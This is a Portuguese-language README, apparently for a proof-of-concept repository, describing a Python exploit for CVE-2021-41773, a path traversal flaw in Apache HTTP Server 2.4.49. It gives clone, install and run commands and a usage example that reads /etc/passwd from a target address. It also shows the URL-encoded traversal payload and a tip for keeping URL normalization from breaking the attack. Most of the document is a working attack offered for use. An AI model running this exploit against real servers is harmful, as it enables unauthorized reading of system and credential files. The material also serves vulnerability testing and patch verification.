
Exploit em Python para CVE-2021-41773 - vulnerabilidade de Path Traversal no Apache HTTP Server 2.4.49
Um exploit em Python para CVE-2021-41773, uma vulnerabilidade de path traversal no Apache HTTP Server 2.4.49 que permite ler arquivos arbitrários do servidor.
CVE-2021-41773 é uma vulnerabilidade de path traversal no Apache HTTP Server 2.4.49 que ocorre devido à validação inadequada de caminhos fornecidos pelo usuário. A vulnerabilidade permite que atacantes leiam arquivos fora do document root usando sequências de path traversal codificadas em URL.
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt
python3 cve-2021-41773.py -t <target> -f <file_path>
-t, --target: URL do alvo (inclua protocolo e porta se necessário)-f, --file: Caminho do arquivo a ser lido do servidor# Read /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

O exploit usa sequências de path traversal codificadas em URL (.%2e/%2e%2e/) para contornar a validação de caminho do Apache:
.%2e) contornam as verificações de segurança iniciaisO segredo é usar urllib3.PoolManager() em vez de requests.get() para evitar a normalização automática de URL que quebraria o exploit.
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}
Isso se traduz em:
/cgi-bin/../../../../{target_file}